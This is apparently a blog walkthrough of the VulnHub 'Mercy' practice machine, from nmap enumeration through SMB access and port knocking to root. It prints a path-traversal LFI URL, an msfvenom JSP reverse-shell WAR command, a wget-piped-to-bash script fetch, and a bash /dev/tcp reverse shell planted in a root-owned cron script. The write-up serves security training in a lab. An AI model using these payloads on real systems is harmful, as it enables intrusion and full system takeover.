https://unsplash.com/photos/rM-9sF8E8_A

DIGITALWORLD.LOCAL MERCY Walkthrough — VulnHub- Multi step Enumeration — OSCP Practice

Mercy is an OSCP like machine in the DIGITALWORLD.LOCAL series which is available on VulnHub. In this writeup I demonstrate how good enumeration and connecting different information from every step together helps to gain a foothold.

Mercy at first look might seem complicated but a good enumerationg from the start and taking note of every little information that might be useful will help us to solve it.

Preparation

1. Download Mercy from VulnHub and bootup in VMware or Virtualbox
2. Your favorite haxor env, in this article I am using a Kali VM
3. Find IP address of Development one way to do it is with namp

nmap -sn 192.168.1.0/24

In this case my IP is 192.168.1.106

Tools

1. nmap
2. smbclient
3. nc
4. gobuster
5. msfvenom
6. Linux Smart Enumeration
7. find (bash)

Topics

• Note taking!
• Port knocking
• robots.txt
• Tomcat (war reverse shell)
• crontab

Enumeration

Starting with good ol’ nmap!

sudo nmap -p- -sC -sV -T4 -O -v 192.168.1.106 -o nmap

Result

# Nmap 7.91 scan initiated Fri Feb  5 11:59:35 2021 as: nmap -p- -sC -sV -T4 -O -v -o nmap 192.168.1.106
Nmap scan report for MERCY.wlan (192.168.1.106)
Host is up (0.0011s latency).
Not shown: 65525 closed ports
PORT     STATE    SERVICE     VERSION
22/tcp   filtered ssh
53/tcp   open     domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp   filtered http
110/tcp  open     pop3        Dovecot pop3d
|_pop3-capabilities: STLS CAPA SASL TOP AUTH-RESP-CODE RESP-CODES PIPELINING UIDL
|_ssl-date: TLS randomness does not represent time
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open     imap        Dovecot imapd (Ubuntu)
|_imap-capabilities: more IMAP4rev1 STARTTLS post-login listed SASL-IR Pre-login ID ENABLE LOGIN-REFERRALS IDLE capabilities OK have LITERAL+ LOGINDISABLEDA0001
|_ssl-date: TLS randomness does not represent time
445/tcp  open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open     ssl/imaps?
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-08-24T13:22:55
| Not valid after:  2028-08-23T13:22:55
| MD5:   5114 fd64 1d28 7465 e1c8 8fde af46 c767
|_SHA-1: b1d2 b496 ab16 ed59 df4e 396e 6aa4 94df e59f c991
|_ssl-date: TLS randomness does not represent time
995/tcp  open     ssl/pop3s?
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-08-24T13:22:55
| Not valid after:  2028-08-23T13:22:55
| MD5:   5114 fd64 1d28 7465 e1c8 8fde af46 c767
|_SHA-1: b1d2 b496 ab16 ed59 df4e 396e 6aa4 94df e59f c991
|_ssl-date: TLS randomness does not represent time
8080/tcp open     http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry 
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:2C:AB:27 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.018 days (since Fri Feb  5 11:33:58 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
| nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   MERCY<00>            Flags: <unique><active>
|   MERCY<03>            Flags: <unique><active>
|   MERCY<20>            Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: mercy
|   NetBIOS computer name: MERCY\x00
|   Domain name: \x00
|   FQDN: mercy
|_  System time: 2021-02-05T17:59:55+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-02-05T09:59:55
|_  start_date: N/A
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb  5 12:00:07 2021 -- 1 IP address (1 host up) scanned in 32.11 seconds

• Port 22 and 80 are filtered it means they might get open later somehow, might be port knocking!
• 139 and 445 related to samba (smb) are open, trying to connect to it needs creds, might become useful later!

• Port 8080 is Tomcat, defualt creds doesn’t work!, but looking closer to the nmap result reveals the interesting content of robots.txt, worth checking!

| http-robots.txt: 1 disallowed entry 
|_/tryharder/tryharder

Also looking at the page on browser reveals the location of tomcat users, which is sensitive info and might be useful.

Users are defined in /etc/tomcat7/tomcat-users.xml.

During the pentest in addition to screenshot and notes on Obsidian, I try to write down with pen on paper these little information that might become useful at some point, it will help alot to circle back and see what we have.

Getting Deeper

Next thing we can try is to check out content of /tryharder/tryharder which is a base64 string.

It suggest the password is “password”, from enumerating smb we saw there was a user name qiu lets try the password for it

And we have access, after mounting the folder and searching through hidden files we get to see a lot of configuration including port knocking configs, it will help us to open ports 22 and 80 as we forseen from nmap results.

sudo mount //192.168.1.106/qiu smb -o username=qiu -o password=password

The main page of port 80 is a trolling but there might be interesting stuff sitting behid

gobustering…

gobuster dir -k -w /usr/share/wordlists/dirb/common.txt -t 1 -u http://192.168.1.106 -o gobuster-80

• Another robots.txt with interesting stuff!

• /time that returns current time of the system, this indicates some scripts are running somewhere, it might get handy later, lets write it down to notebook!

Browsing locations on robots.txt, the /nomercy returns RIPS 0.53, after googling turns out it has multiple local file inclusions

https://www.exploit-db.com/exploits/18660

We dump passwd as exploit docs suggested but we got the tomcat user address that we possibly can read too and also tomcat login url from enumeration part.

So lets dump tomcat users with RIPS LFI and try to login to tomcat.

http://192.168.1.106/nomercy/windows/code.php?file=../../../../../etc/tomcat7/tomcat-users.xml

the supper dupper long one works!, lets take a note of the the fluffy account to it might get handy!

Now we can deploy a tomcat application which in our case is a reverse shell made by msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.105 LPORT=3333 -f war > shell.war

And after running your local nc to reverse to, Browse > Deploy then select it so it will run on the server!

We got a shell with tomcat user after enumerating it wont lead us anywhere so lets switch to fluffy account

And enumerate again with Linux Smart Enumeration script!

bash <(wget -q -O - https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh) -l2 -i

It still doesn’t lead us to anywhere… backing up a bit and looking at our notes makes us remember that there was a /time that was returning current time lets search the file system for time

witch return /var/www/html/time which is a result of a script somewhere its either names differently or its hidden, after searching through hidden files found .private on fluffy home directory.

find /home -iname  ".*" 2>/dev/null

And bam timeclock script is exactly the thing which helps us gain root access, its owned by root and has 777 permission so we can write on it with fluffy!

Lets add a reverse shell to the script so next time by a cronjob which owned by root the script will run it return our root shell!

bash -i >& /dev/tcp/192.168.1.105/4444 0>&1

Post Exploitation

There wasn’t much to discover inside this machine but I just wanted to check the crontab, so every 3 minutes timeclock will executed by root :)

Conclusion

This machine might not be a technical advanture but certainly engages your hacking brain and gives you a hacking mindset to look clearly and closely and take a good note of every little detail which might become helpful later on.

I hope you enjoyed this post.